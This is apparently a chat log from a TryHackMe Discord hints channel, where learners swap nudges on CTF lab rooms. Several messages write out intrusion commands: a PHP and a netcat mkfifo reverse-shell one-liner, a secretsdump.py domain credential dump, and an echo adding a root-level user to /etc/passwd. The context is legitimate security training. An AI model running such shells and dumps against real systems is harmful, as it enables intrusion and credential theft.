#room-hints

1 messages ยท Page 23 of 1

stuck fractal
#

doesn't that one have browser control?

#

I managed the room with a single VPN session

untold birch
#

it does yes

stuck fractal
#

So the browser control isn't dependent on the VPN

untold birch
#

yes, but the in browser Windows 10 box doesn't have RDP

#

you are the default user in that session and that's it you can't log out and log in as someone else, I've even tried runas and the works, nothing

stuck fractal
#

Windows ships with an RDP client

#

Connect to the VPN, use the VPN IP and RDP in with the admin creds

untold birch
#

mind if I dm?

#

oh boy do I feel dumb....

#

lmao thanks bro, I appreciate you. I've been on tryhackme since 9AM so my brain is fried I guess

#

is the password in exact format or do I need to loose the space?

stuck fractal
#

The space?

#

No spaces in it

untold birch
#

can I show you what I meqn via dm?

#

mean**

stuck fractal
#

I guess

#

(I mixed 2 people up, there was spaces)

nimble onyx
#

I'm trying to do the webappsec101 room and I'm having some trouble with finding the checkpassword page
I found on the /users/ directory there's a link to check_pass.php but when I try to go to ip/users/check_pass.php it tells me the page doesn't exist

summer snow
#

@nimble onyx where on a website might someone want to "check password"?

nimble onyx
#

@summer snow

stuck fractal
#

maybe it 404s for GET requests

nimble onyx
#

oh hmm

#

I tried every http action, no luck

#

hmm

#

I'm stumped ngl

#

is it possible the room is bugged?

stuck fractal
#

Other people have had it working

summer snow
#

still think my hint was a good one lol where on the website might you see or expect some function to check a password. Either way with web apps you should be going through all functionality to understand what it does if you do that.. you'll see it

stuck fractal
#

i can maybe take a look later on but I need to test this first

nimble onyx
#

ah I found it, I'm dumb...

#

though I'm still confused, why wasn't it under users/check_pass.php

#

it was there in the directory

summer snow
#

if you look at the request you don't get a 403 or 401 but a 404 it's possible the reference is there but file doesn't exist. If you look at the right one that you found you can see it's not the same filename

nimble onyx
#

gotcha

true gazelle
#

hello everyone , so im at the WebAppSec 101 room [Task 4] Authentication q3:
"What is the name of the cookie that can be manipulated? "
i got the username &password for admin account why cant i log in

#

with the admin credintials

shrewd skiff
#

@true gazelle Think of a way to browse cookies

true gazelle
#

have i got anything wrong?

shrewd skiff
#

@true gazelle you are asked to provide the "name" of the cookie. I would probably press F12 in the browser

true gazelle
#

i assumed it spouse to be "PHPSESSID" but its not

#

if i search thro the F12 bar
i can see the very same cookie that i took a pic of Earlier

shrewd skiff
#

@true gazelle look again ๐Ÿ™‚

#

Think about that a cookie Can be described as more than just a cookie. This is hints so itโ€™s a vague hint.

compact crown
#

but the format does not match

#

is the webserver maby updated to a ..* version instead of ..**

#

nmap also gives the same output, could it be a bug?

rancid crystal
#

are you looking into one of the listed vulnerabilities?

white salmon
#

look at vulnerabilities

rancid crystal
#

@compact crown ^^

compact crown
#

well

#

i feel stupid ๐Ÿ™‚

rancid crystal
#

at some point we all do ๐Ÿ™‚

#

There will be multiple vulnerabilities 22 in your case and one them contains your answer. I think you are looking at open ports scan atm?

compact crown
#

Yes, i am looking at the vulnerabilities, but i looked into the HTTP issues instead of the apache HTTP issues ๐Ÿ™‚

white salmon
#

i was about to say look at apache lol

compact crown
#

the answer was in the apache HTTP issues category xD

white salmon
#

glad you got it

compact crown
#

@white salmon @rancid crystal thanks for the help!

white salmon
#

Hai

#

Hello, do you need something? animewave

slender totem
#

Anyone did the steel mountain on oscp path here?

#

Trying to figure out the powershell -c question

sand lark
#

Hi guys, do someone is working on Jack's room? Stuck with the dictionnary, seems that we need to use another wordlist but I've tried somes without success...

#

Anyone did the steel mountain on oscp path here?
@slender totem Think how you can list services with native powershell command

tidal sedge
#

@sand lark Try a few wordlists that are installed by default on Kali.

white salmon
#

@slender totem yes what do you need?

#

nvm you found it already :)

sand lark
#

@sand lark Try a few wordlists that are installed by default on Kali.
@tidal sedge Okay, will take a look with another than rockyou. Thanks!

tidal sedge
#

@sand lark Please check rule #1 in #rules
Next time please don't pm me without permission. ๐Ÿ™‚

sand lark
#

Okay, sorry. That was just to thanks ^^

fossil cosmos
#

Introductory Networking, task 8, #6

#

there's no registrant adress

#

address*

#

i dont know what it's talking about

inland onyx
#

My guess

#

Would be that you didn't run the second scan

#

And are still looking at the first company @fossil cosmos

fossil cosmos
#

ok, thanks

inland onyx
#

Yeah, I've just checked -- that company definitely has a registrant address

#

Although you may need to read between the lines, given it splits it up into street, city, etc...

hazy walrus
#

Hi guys, can anyone give me a hint for the "juiceshop"?

#

I'm trying task5.1, is it just a bruteforce? I can't seem to find any info about Jim

rancid crystal
#

SQL Injection

hazy walrus
#

I find ways to inject other requests, but not the reset method as written in the hint.

stuck fractal
#

@hazy walrus if you're trying to reset Jim's password. Osint. Look at product reviews. Establish who Jim is.

hazy walrus
#

Thanks @stuck fractal

#

@stuck fractal got it ๐Ÿ‘

cedar path
#

Linux Challenges, Task 4, #7. Please help.

#

I really have trouble understanding how to stack commands, espcially combining find with other things

turbid bloom
#

@cedar path you can use regex

#

just use find and pipe to grep i think it should work

cedar path
#

I'll try it again

#

@turbid bloom thank you!

cedar path
#

okay so I don't get it, I do "find /" which searched the whole system then "| grep -e 4bceb" for the specific string of character I'm looking for. In my mind that means "search everything, all lines in all files, for this specific sequence of characters"

inland onyx
#

It does not

#

It means find every file, and search the titles for 4bceb

night cave
#

I was typing the whole explaination but it seems like Muir got it

inland onyx
#

Hehe ๐Ÿ˜›

night cave
#

:p

cedar path
#

Muir understands my specific brand of stupid which I greatly appreciate

night cave
#

Muir is kind of person who can literally explain the things in the way you can get it by thinking it thoroughly once.

inland onyx
#

Aw โ™ฅ๏ธ

#

(Better hope that doesn't fail me. My job today is to figure out hashing algorithms, write one, and explain it in a blog post so that I don't drive anyone insane with this next room)

night cave
#

Ah, the one you mentioned few weeks ago.

inland onyx
#

Mhm

#

That's the one

#

I finally have time to implement it

#

So tempted to do it in Rust, just for the challenge.
That's my other job just now. Learn Rust ๐Ÿ˜

night cave
#

Share the link or the implementation if it won't spoil the room, ofc.

inland onyx
#

Hehe, I'll share the blog post once I've got it written. I'm posting that publicly anyway ๐Ÿคทโ€โ™‚๏ธ
The challenge in the room will be to understand how it all works, and purposefully break it anyway

cedar path
#

wait before you go, let me pick thy brain. If my command as desciribed above is looking for the file using grep, i can find files using 'find' so grep is redundant

night cave
#

I'm assuming you're going to make it vulnerable on purpose, if you don't it'd be one hell of a challenge that I'd love to try.

inland onyx
#

@cedar path Correct, yes ๐Ÿ™‚

#

@night cave Ooh, that's an idea actually.
The challenge is going to be building the algorithm, and deliberately changing a few lines to make it a completely different output

#

The output will be a password in the room

#

Should require total understanding of the function to do it

night cave
#

Curious.

inland onyx
#

I wasn't going to write a post on it originally, but honestly, this thing is turning my brain into mush, and I like maths

stuck fractal
#

Enjoying your Merkle Damgard constructions? @inland onyx

cedar path
#

So, in english, what's the stack of commands to solve this :

Find flag 26 by searching the all files for a string that begins with 4bceb and is 32 characters long.

I used the 'strings' command in an earlier problem but that time I had a specific file to search through. I think it's a stretch to search the entire system for this specific line of characters

night cave
#

Dude, as much as I love reverse engineering and the code analysis I enjoy learning the implementationa of hashes, I think I'll love that challenge :D

inland onyx
#

@stuck fractal Let's not even go there ๐Ÿคฃ

stuck fractal
#

@cedar path The question changed, but the location of the file didn't because that's a part of the VM which is a little harder to change

digital iris
#

i'm doing the attacktive directory room and i'm stuck on task 7. i'm confused on what it means by what method and i can't get the secretsdump script to work. error:

[-] RemoteOperations failed: [Errno Connection error (spookysec.local/:445)] [Errno -2] Name or service not known
[*] Cleaning up... 
cedar path
#

Is it asking me to find flag 26 and then search the contents using what I learned earlier?

stuck fractal
#

Name or service not known... I think it wants a protocol in front of spookysec.local?

tidal sedge
#

@digital iris I think you need to specify -dc-ip

digital iris
#

@tidal sedge yeah i have that in the command

#

this is my command ||secretsdump.py -just-dc -dc-ip 10.10.176.9 backup@spookysec.local||

graceful nacelle
#

Find all files in the /usr/bin directory (recursive) that are owned by root and have at least the SUID permission (use symbolic format)
my submision: find /usr/bin -type f -perm 4000 -name root. why is this worng

#

wrong*

stuck fractal
#

@graceful nacelle Use symbolic format.

graceful nacelle
#

ugo doesnt have super users

wraith marsh
#

Find / -type f -perm -4000 -xdev 2>/dev/null

#

Is what I use

stuck fractal
#

@graceful nacelle No, but symbolic can

#

And it's techically u because it's related to owner

wraith marsh
#

Oh wait my bad didnโ€™t realise it was a room question ๐Ÿ˜‚ should have looked ๐Ÿคทโ€โ™‚๏ธ

graceful nacelle
#

find /usr/bin -type f -perm -u=s -name root.....smh its wrong

inland onyx
#

Correct

#

You're looking for binaries files with SUID called root

stuck fractal
#

lmao

shadow basin
#

find /usr/bin -type f -perm -u=s -name root.....smh its wrong
@graceful nacelle I believe you want instead of "-name" use "-user"

graceful nacelle
#

i get so frsutated sometimes...

shadow basin
#

we all do

graceful nacelle
#

alright well i just finshed the "find command" course. Now im pretty confident itll help me with task 33 in "LL".

#

as always thank you for the help

shadow basin
#

congrats @graceful nacelle once you get to last question of "LL" feel free to give me a hint. ๐Ÿ˜„ I am still strugling with it

graceful nacelle
#

i feel it man haha wish me luck

shadow basin
#

Something must be wrong, all is given just 'IP address'. No 'User Name', no 'Password'. How am I expected to get into the machine????????

inland onyx
#

...

#

You are kidding, right?

tidal sedge
#

@shadow basin I sure hope you're kidding

inland onyx
#

Small reminder. This is a hacking site ๐Ÿ˜
How do you think you're meant to get into the machine?

peak girder
#

yeah.. I thought it was satire....

shadow basin
#

all good I think I found the way.

peak girder
#

so it was a real question?

shadow basin
#

@peak girder thats what came to mind firstly. Then I remembered this channels sincere sentiment "Try Harder" and since then all went "goot".

stuck fractal
#

It's not a meme in this channel

#

It's a sincere sentiment that exists in infosec

peak girder
#

should be a life sentiment :p

graceful nacelle
#

/etc/shiba/shiba4
find: โ€˜/etc/polkit-1/localauthorityโ€™: Permission denied
find: โ€˜/etc/ssl/privateโ€™: Permission denied
find: โ€˜/home/shiba1/.gnupgโ€™: Permission denied
find: โ€˜/home/shiba1/.local/shareโ€™: Permission denied
find: โ€˜/home/shiba1/.cacheโ€™: Permission denied
/home/shiba4
/home/shiba4/.profile
/home/shiba4/.bashrc
/home/shiba4/.bash_logout
find: โ€˜/home/nootnoot/.gnupgโ€™: Permission denied
find: โ€˜/home/nootnoot/.local/shareโ€™: Permission denied
find: โ€˜/home/nootnoot/.cacheโ€™: Permission denied
find: โ€˜/home/shiba2/.local/shareโ€™: Permission denied
find: โ€˜/lost+foundโ€™: Permission denied
/opt/secret/shiba4
If i exacuted the binanry corectly the password would be displayed in this giant list wouldnt it?

stuck fractal
#

No

graceful nacelle
#

ok

stuck fractal
#

You can a find command

#

Find finds things

shadow basin
#

@graceful nacelle this list is the result of "find" command. *"Permission denied" - means you dont have permission to search in those locations. Try redirect it with by adding "2>/dev/null" result of find command will look nicer. ๐Ÿ˜‰

graceful nacelle
#

but wouldnt find pull up te same results?

#

well nm that actually why i didnt use find

stuck fractal
#

Find doesn't run the binary for you though

shadow basin
#

I think #room-hints should be divided by user levels. For example: "easy", "medium", "hard"

stuck fractal
graceful nacelle
#

/home/shiba3/home/test
this seems redundant. why am i being asked to make home directory for test

stuck fractal
#

That one is bugged

#

And that's not what you're bing asked

#

And that's not how you do it either.

shadow basin
#

@graceful nacelle I had same problem.

graceful nacelle
#

it could have just been left alone fromthe start?

stuck fractal
#

there's a directory called test in your home directory That's what it's testing for

#

Your home directory is a special file path in Linux

#

/home/yourUserName normally, with exceptions

shadow basin
#

@graceful nacelle in linux terminology when they speak "your home directory" they mean your "/home/username" directory. Not your "/home/username/home" directory.

peak girder
#

@graceful nacelle use cd ~ it'll go to your home directory

#

after that use pwd so you'll know where you are

steady stratus
#

^

peak girder
#

(sometimes it's just easier to see it than it being explained)

stuck fractal
#

@peak girder Also, cd on it's own will take you home.

#

One that people don't tend to know or use

graceful nacelle
#

yeah i really kept wondering how creating a home dir was benefical.

peak girder
#

a home directory is created on making a user... normally

steady stratus
#

a home directory doesn't have to be named home

#

home directory is just whatever the default directory is set too - which is why root's home directory is /root and not /home/root

peak girder
#

woah woah woah.. @steady stratus don't explain him the leet stuff...

steady stratus
#

lmao ๐Ÿ˜›

peak girder
#

@peak girder Also, cd on it's own will take you home.
@stuck fractal yeah I don't use that because it tends to get stuck in muscle memory and I keep doing it unnecessary. Plus.. if you'd explain that to a new user they tend to think that's only used for getting to your home directory :p

steady stratus
#

:^

#

I always forget of cd tbf

#

just muscle memory

peak girder
#

just muscle memory
@steady stratus it's annoying because i'll be going to my home directory for like.. 5 times every 2 minutes :p

steady stratus
#

hehehe yup!

graceful nacelle
#

alright now i gotta figure out how to remove a file thats tno empty

#

*not

peak girder
#

also now we're on the track of cd, cd - is a great one to switch between directories ๐Ÿ˜„

steady stratus
#

cd ../ then cd ../ > cd ../../ as well lmao

#

oof

stuck fractal
#

cd .. works too

#

I always append a /

steady stratus
#

yup lmao

peak girder
#

@graceful nacelle try and google! maybe read up on linux in general

graceful nacelle
#

oh yeah lol

peak girder
#

donig these kinds of things is most of the times: "reading, reading, reading, trying that one thing, reading, reading, reading"

graceful nacelle
#

barely even a month into linux atm

peak girder
#

It'll teach you A LOT about linux.. if you're going to do those, you can DM me anytime with questions and I'll give you hints on it ๐Ÿ˜‰

#

hell,... you can even have my old notes on the rooms (I'll take out the keys ๐Ÿ˜‰ )

graceful nacelle
#

whoa that looks awesome

#

thanks man ๐Ÿ™‚

peak girder
#

@graceful nacelle great! tell me if you need anything for that!

graceful nacelle
#

its gonna be a minute, i really wanna solve the current task at hand or else i wont be abke to focus on anything else

summer snow
#

bandit is fantastic really struggled with the last few but learned a lot and the rooms here really on linux solidified my knowledge and level of comfort with linux. Might have to do underthewire I don't know how to do anything on powershell. I know there's a room here i'll have to do aswell

sharp bolt
#

anyone has done the final challenge of intro to python? i'm stuck

inland onyx
#

What's up with it?

sharp bolt
#

i'm trying to use 5 times the function b64decode, thn 5 times b32decode and then 5 times b16decode. with for loops

#

but doesnt work

inland onyx
#

I have a sneaky suspicion you've got that the wrong way around. Can't remember, one sec

sharp bolt
#

he says its been encoded using base 16, then base 32, then base 64

#

so to decode i normally should start from the end

inland onyx
#

Yep, sorry, that's my memory acting up

sharp bolt
#

but the coded string in the file doesnt look like base64, thats weird

inland onyx
#

You're on the right track -- I can't really do much more in #room-hints; you're on the right lines with decoding five times each, just remember to save the result each time

stuck fractal
#

@sharp bolt Also, it might have been encoded the other way

#

as in outer layer is 16

inland onyx
#

That was my memory too

#

But the task indicates it is that way around

stuck fractal
#

Yeah the task is misleading

inland onyx
#

Can you paste the string here @sharp bolt -- I can't be bothered downloading the file

sharp bolt
#

its over 2000 caracters

inland onyx
#

Dang

sharp bolt
#

but basically it looks like that 343333333433333333333333333333333433333334

quartz furnace
#

hello everyone

#

im kinda stuck on a learn linux room

#

when i enter cat alone i get like prompted underneath and can't find a way to get out

#

on the putty remote machine that is

stuck fractal
#

Don't type cat alone

#

Control C

quartz furnace
#

thanks that saved me lol

stuck fractal
#

@inland onyx Outer layer is indeed 16

#

I just completed the room

inland onyx
#

Blugh, yes, it is indeed

#

I've just done it too

#

That.. could be worded better

sharp bolt
#

i tried starting with b16decode but i get a python error

stuck fractal
#

That's on you

#

Works fine here

inland onyx
#

Same ^^

stuck fractal
sharp bolt
#

ok at least i have faith

#

thnks

inland onyx
#

That is an ouch ๐Ÿ˜†

sharp bolt
#

i manage to decode the base16

graceful nacelle
#

just finsihed task 33.... the password actually made me lol

peak girder
#

Great! @sharp bolt and @graceful nacelle

sharp bolt
#

got the flag

#

thanks for your help @inland onyx

exotic rose
#

For basic pen testing room, any hints on how to find valid user? Iโ€™ve used enum4linux, nmap smb-enum-users script and rcpclient enumdomusers

stuck fractal
#

Try enumerating manually

exotic rose
#

With smbclient?

stuck fractal
#

This is hints. I gave you a hint

exotic rose
#

Thank you Iโ€™ll try it

#

Omg I found it what a good hint๐Ÿ˜‚

wraith coyote
#

Investigating Windows: #10 tried every date

#

I got all the question except this one, I looked at event logs and file dates.

#

Got it

tawdry dove
#

Good morning.

#

I wanted to ask a hint for jackinthebox but I clicked hint and found the flag. However can I elevate privilages to root in this?

#

I only managed to get the flag

#

I know for one that in OSCP you need to be root not just fetch the flag

#

I was trying to crack the hash yesterday but no dice

shrewd skiff
#

@tawdry dove there are two rooms that responds to the word "jack".. which of them is it?

tawdry dove
#

jackofalltrades not jakonthebox

#

My bad

glossy basin
#

i'll check my notes on that, @tawdry dove

#

you need privilege escalation, right?

tawdry dove
#

I just wondered if anybody did it

glossy basin
#

I did

#

So the hint is:
Find a SUID which allows you to read files or operate with them

#

just list ALL the SUID files and it'll be pretty obvious on which one you should use

main mantle
#

Hello!
I think I need a hint on basicpentestingjt
I'm at the 3rd question, and i don't know how to find the domain name of the server to use dirbuster ?
Did i miss something ?

white salmon
#

you mean #3? @main mantle

main mantle
#

Yeah

#

This one

#

I ran the nmap, and i've come to this : Discovered open port 139/tcp Discovered open port 445/tcp Discovered open port 80/tcp Discovered open port 22/tcp

white salmon
#

maybe try running another buster?

tidal sedge
#

@main mantle Directory brute-force port 80

white salmon
#

what you wanna find is a directory

#

in the webpage

main mantle
#

I'll be right back

main mantle
#

Thanks i think it's alright!

tawdry dove
#

@glossy basin I completed the task. I got the flag but I nevr got root

#

That's what i was asking

glossy basin
#

oh

#

in this room you are not supposed to get root privs

#

just the flag

#

it basically shows that you can only use it for accessing the file system

white pike
#

Hey ๐Ÿ™‚ I could need a little nudge for "Tempus Fugit Durius". Got access, found some interesting things and can login into another service. But when I want to choose a mode, it doesn't work ๐Ÿค”

pine ermine
#

Think I just jumped in the biggest of rabbit holes @ Tempus Fugit Durius

proud cloud
#

hey guys, can anyone help me out. im on the common linus priesc room and stuck on task 9;

#

#4

Now we're inside tmp, let's create an imitation executable. The format for what we want to do is:

echo "[whatever command we want to run]" > [name of the executable we're imitating]

What would the command look like to open a bash shell, writing to a file with the name of the executable we're imitating

peak girder
#

@proud cloud the echo "text" > file means you'll put the string "text" into a file called 'file', does that help a bit?

#

you can append with >>

proud cloud
#

thank you ill have a read through that now

peak girder
#

hope it helps

rapid flower
#

Hello there! Im doing Ignite room (https://tryhackme.com/room/ignite).
There is a RCE bug in this Fuel CMS, i can try run commands like ls, but i cant create a reverse shell. I tried with
running python and php interpreter, but i didnt manage to get connection. When i look into "ps aux", i cant
see that my reverse shell are running (no permissions to php/python/bash?). I tried to setup reverse shell
in php file instead. I created one:

-rw-r--r-- 1 root     root       163 Jul 26  2019 .htaccess
-rwxrwxrwx 1 root     root      1427 Jul 26  2019 README.md
drwxrwxrwx 9 root     root      4096 Jul 26  2019 assets
-rwxrwxrwx 1 root     root       193 Jul 26  2019 composer.json
-rwxrwxrwx 1 root     root      6502 Jul 26  2019 contributing.md
drwxrwxrwx 9 root     root      4096 Jul 26  2019 fuel
-rwxrwxrwx 1 root     root     11802 Jul 26  2019 index.php
-rwxrwxrwx 1 root     root        30 Jul 26  2019 robots.txt
-rw-r--r-- 1 www-data www-data     0 May  2 06:07 test.php

But i actually cant write into it:
echo '$sock=fsockopen("10.9.0.0",444);exec("/bin/sh -i <&3 >&3 2>&3");' >> test.php
How is that possible? I have file perm to do it NotLikeThis? Can someone give me a hint, of
what should i do? wut

tidal sedge
#

@rapid flower Just use netcat to get a shell, you're over complicating things.
Or alternatively you could use this:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <Tunnel IP> 4444 >/tmp/f

inland onyx
#

(Well worth reading up on that as well)

rapid flower
#

Thank you! I will try this up~

#

Running normally nc didn't helped, but this long solved everything. paradox
Thanks @tidal sedge blobheart

tidal sedge
#

You're welcome ๐Ÿ™‚

sharp bolt
#

need a little help on the 2nd challenge of the scripting room

#

do i understand correctly that my sripts needs to wait for port 1337 to be open as a starting point

#

and once it is, it needs to send it 0 as a first number

peak girder
#

@sharp bolt just try it! you'll find out soon enough

shy sinew
inland onyx
#

(Submit it on the room -- not here @shy sinew ๐Ÿ™‚)

vernal ridge
#

@wooden mist Can I DM you about the ConvertMyVideo challenge?

shy sinew
#

I have submitted it on the room but it is shown in the writeup section yet @inland onyx

steady stratus
#

The room author (muirl in this case) has to accept it before it is added as a writeup ๐Ÿ™‚

rancid crystal
#

it will be after the owner approves it

inland onyx
#

Huh?

#

That's a Pars room

steady stratus
#

oh it is?

#

whoops kekw

tidal sedge
inland onyx
#

Speaking of Pars

#

Where the heck is he?

wooden mist
#

@vernal ridge i'd prefer not as the room was just released

vernal ridge
#

oh okay

pine ermine
#

Someone online I can ask a yay/nah question about Tempus Fugit Durius?

tranquil dagger
#

I don't know how far you've gotten on that machine, but maybe I can answer you, @pine ermine

delicate sorrel
#

any1 done ctf100 task 74? cant seem to find the password

hot skiff
#

@pine ermine I can answer. I think ๐Ÿ™‚

white pike
#

@hot skiff could you give me a hint for flag 2? I think I enumerated everything multiple times and getting crazy ๐Ÿ˜‚

hot skiff
#

@white pike You usually scroll right past this bit when examining LinEnum output. At least I often do.

pine ermine
#

Hahah thanks @hot skiff - Iโ€™ve got confirmation I was deep into a rabbit hole. Iโ€™m trying harder as we speak. Hope to find something soon!

spark mason
#

Any hints for the convertmyvideo room? I've been stuck for a while

nocturne vault
#

same here, stuck on privesc if anybody feels like giving a nudge (convertmyvideo)

inland onyx
#

I tested it, so I can't really give much here

#

I will suggest not over thinking it though

#

It's comparatively a simple privesc

nocturne vault
#

hmm okay thanks.. I may be overlooking something

pine orbit
#

hey @nocturne vault can you give me a little nudge on getting a foothold on the box (convertmyvideo)? found the hidden dir but cant find a username

nocturne vault
#

sure DM me

wraith marsh
#

Could I ping something off somebody about Tempus please? I think I might be deep in a rabbit hole but not sure ๐Ÿ˜„

stuck fractal
#

@wraith marsh Please keep the imagery PG13

wraith marsh
#

Sorry ๐Ÿ˜ฉ

summer snow
#

can someone give me a hint for 25days of christmas task 10 question 2?

stuck fractal
#

Task 10 or day 10?

summer snow
#

task

stuck fractal
#

Be a stalker.

#

Hunt Lola down

#

Everywhere

summer snow
#

just noticed there's a resources link i'll check that out just can't find her actual occupation and no linkedin from what I saw aha found an archived page with an official occupation title sorta listed but that wasn't right. I'll keep checking stuff ๐Ÿ‘

#

ugh I saw it, tried it but it said incorrect should've copied and pasted or made sure I was typing it correctly lol

scarlet plinth
stuck fractal
#

What if you're in the owner's group?

scarlet plinth
#

u mean i should write 664

stuck fractal
#

@scarlet plinth You're in the hints channel. I gave you a hint, something to think about.

scarlet plinth
#

ok

frail hull
#

Hi guys, https://tryhackme.com/room/juiceshop Task[5] #1, any hints on where should i look for more info on Jim?

stuck fractal
#

@frail hull OSINT

#

Start with product reviews

frail hull
#

@stuck fractal ok, thanks

sonic night
#

Man I cannot get a foothold on convertmyvideo, any dm nudges would be appreciated. I am serving it files but not sure where to get my foothold

sonic night
#

nvm I think I'm on the right path

graceful sun
#

is there a reason smb1 is disabled on the Active directory box? i need to access it with smbclient and i have the password but its disabled it says . i need a file in there

stuck fractal
#

@graceful sun because SMB1 is deprecated and insecure?

#

RDP in

graceful sun
#

it says Using utility can we map remote SMB shares? then asks to grab a file with it. i still rdp in?

#

and its smbclient. so i figured thats what it was. i just wanna make sure we are thinking of the same thing.

#

task 6 #5

#

shit there is walkthroughs , sorry . dont wanna waist anyone times when there is lol my bad

sonic night
#

There are a few write ups under the writeups

#

๐Ÿ™‚

graceful sun
#

yea lol suhh

stuck fractal
#

@graceful sun SMBClient will do more than smbv1

graceful sun
#

gotcha. and like on the walkthrew its showing on his smbmap the shares and whats in the files i do the same command but i only get the share names not the contents do you knwo why that might be

stuck fractal
#

@graceful sun smbmap doesn't give you the contents of files

graceful sun
stuck fractal
#

@graceful sun Nope.

graceful sun
#

whats all those files under the shares that i didnt get on his smbmap? just wanna know so i learn not doubting you

stuck fractal
#

That's the files on the share

graceful sun
#

lol sorry i been looking at the writeup as little as possible so i didnt see that haha

graceful sun
#

[-] RemoteOperations failed: [Errno Connection error (spookysec.local:445)] timed out
sorry so now i got the passwd but im getting this.

#

doing the same thing in the write-up

#

i wonder if my metasploit is still runnung and blocking it or something

#

nope

#

im gonna stop now.... it expired and didnt tell me .... lol

#

the problem is still there tho. wth

graceful sun
#

wow, i got it now...

hasty oasis
#

When sending data over TCP, what would you call the "bite-sized" pieces of data

#

what does this mean ?? and answer plaese

summer snow
#

re-read the text before the questions all the answers are there

#

also don't spam multiple rooms with the same question

echo thunder
#

Hello all

#

any hint on convert my video? I cannot find a username

tawdry dove
#

In yearoftherabbit I found this
What could this be?

#

||+++++ ++++[||

#

Some kind of code

#

Found it.

echo thunder
#

Hi all

red minnow
#

Hi everyone. I'm doing the "ConvertMyVideo" room but i can't find the user(task2). Can anyone give me a hint on what i am supposed to do?

lament yacht
#

Hello, I am doing the "Agent Sudo" room. I can't get any progress on it, can anybody please give a hint.
Here is what I have tried:

I think it has something to do with the User-Agent field of a http request. So I replace the value of the field with "sudo" cuz the challenge name is agent sudo.
I tried to connect to ftp using anonymous but didn't work.
I tried the metasploit module for "ssh user enun". I got a username and tried to put the username in the User-Agent field.
I tried brute forcing ssh using hydra with the username I got.

Please help, what I am missing.

shadow basin
#

@lament yacht sorry did you specify at which task you at?

lament yacht
#

At the first one.

shadow basin
#

@lament yacht And what is exactly your hazard? What the task asks, and at what you are strugling?

lament yacht
#

@smith3301
It is Task 2
Question: How do you redirect to the secret page?
Question: What is the agent name?
I got one username by "enumerating ssh for username" but it is not working. So I am stuck at this point. Can't get any progress.

heady pulsar
#

@lament yacht Have you enumerated the web page?

lament yacht
#

@heady pulsar
I tried gobuster with the medium list. But it got to 30% with no progress so I stopped.

#

@heady pulsar
I will try it again.

heady pulsar
#

@lament yacht Sounds good. if you're not having luck with a medium list, try a big list or a different one ๐Ÿ™‚

lament yacht
#

@heady pulsar Ok. Thank you very much.

heady pulsar
#

good luck. One of the methods you tried (listed early) will lead you further in

tawdry dove
#

Hey. A hint for privilege escalation on yearoftherabbit?

#

Nothing pops out

#

I tried some paths but no dice

past night
#

do the other rooms by @inland onyx, @tawdry dove you will know afterwards

#

soz for the ping

steady stratus
#

^^ this

tawdry dove
#

Ha! Thanks . Never thought that program could be vulnerable ๐Ÿ˜„

sick sun
#

anyone done ConvertMyVideo room ?

white pike
#

@steady stratus may I PM you and ask if I'm on the right track of PE in Tempus?

plush trail
#

Hi! I'm doing the common linux privesc room and I need to create a new user with root privileges (task 6 question 5). I can write to /etc/passwd. I created a password hash with ||openssl passwd -1 -salt new 123|| and did ||echo new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash >> /etc/passwd|| but I can't su new with password 123, it says authentication failure. if I look in /etc/passwd it shows new::0:0:root:/root:/bin/bash (no x for password). Am I missing something?

dense marlin
#

normally where do linux stored the hashes?

plush trail
#

etc/shadow?

tranquil dagger
#

I guess you need to use single quotes on your echo statement. So echo '...' >> /etc/passwd

#

Otherwise the special characters will screw things up

plush trail
#

quotes worked thanks

marble bridge
#

Hi everyone. I'm doing the "ConvertMyVideo" room but i can't find the user(task2). Can anyone give me a hint on what i am supposed to do?

tribal granite
#

Hi all! BP-Volatility Task4#3. I've uploaded the infected files to hybrid-analysis.com but I can't see the name of the malware to answer the question; i.e. a name that has 6 characters.

proven bridge
#

@marble bridge You will find the user when you figure out how to exploit the Converter.

#

Where would a HTTP Auth (basic auth) users creds be stored?

queen torrent
#

I'm having trouble with Q5 of task 2 of intro researching. pls help

white salmon
queen torrent
#

thxs for the help

inland onyx
#

(That might not be the best way to encourage researching @white salmon ๐Ÿ™‚)

white salmon
#

I know

inland onyx
#

It is literally a room teaching people how to research.

outer meteor
#

is there a way to make the hashes cracking faster?

inland onyx
#

Try not to spoil that?

#

He says

#

Watching Swafox do it too..

white salmon
#

@outer meteor GPU (CUDA)

glossy basin
#

is there a way to make the hashes cracking faster?
@outer meteor have an expensive PC

#

๐Ÿ˜†

outer meteor
#

rip

#

i'm sad right now

#

it's in 0,01%

#

it might take a year

white salmon
#

what are you trying to crack

grand pivot
#

and how

outer meteor
#

i'm doing the crackthehash room

#

and I'm using hashcat

white salmon
#

ok with raspberry or with gpu?

outer meteor
#

what?

#

raspberry?

white salmon
#

raspberry pi

outer meteor
#

i'm in a VM

white salmon
#

this is bad

outer meteor
#

what do u mean

white salmon
#

the windows version is better

outer meteor
#

then why did i install in a VM

#

that doesn't make sense

white salmon
#

for everything else

outer meteor
#

isn't it easier just to put the OS in an external hdd

#

?

white salmon
#

no i personally have a laptop with linux

grand pivot
#

I have it in VM and its just fine

outer meteor
#

how do u crack passwords then?

grand pivot
#

i mean for THM porpous. Are you doing Brute force with or without wordlist?

outer meteor
#

with

white salmon
#

if I have a hash to crack, I copy it to windows because I have a 1080 TI there

grand pivot
#

which wordlist are you using?

outer meteor
#

rockyou.txt (idk other wordlists)

grand pivot
#

so, there is nothing to worry about. Untill now, i didnt need much time to make the attack. Up to 15% so far

outer meteor
#

but mine was running for like 30 min and got 0.02% :/

grand pivot
#

WOW, thats so slow

outer meteor
#

ahaaha

grand pivot
#

do you have gpu?

outer meteor
#

of course

#

but it's crap

grand pivot
#

well, use hashcat in host then

outer meteor
#

It's a nvidia 940mx

grand pivot
#

should be better than that number

outer meteor
#

yeah but how do i use it?

white salmon
#

CUDA

grand pivot
#

pass the hash to your host with any tool. Even you can use drive to upload the file and download with the host

#

then use cuda

#

like kobims says

stuck fractal
#

@outer meteor download hashcat on windows, open powershell

outer meteor
#

I think my pc will explode if i do that with the VM open

#

xD

grand pivot
#

xD

#

hey, what kind of wordlist should i use to make an "extension" attack with burpsuit

#

?

stuck fractal
#

@outer meteor nope.

#

VM doesn't really use GPU

outer meteor
#

I'll try then

white salmon
#

@grand pivotmake your own you probably don't need as many anyway

outer meteor
#

which one do i download binaries or sources?

stuck fractal
#

Well. What's source code?

#

And what are binaries?

outer meteor
#

Idk

stuck fractal
#

@white salmon No.

outer meteor
#

I'm dumb

stuck fractal
#

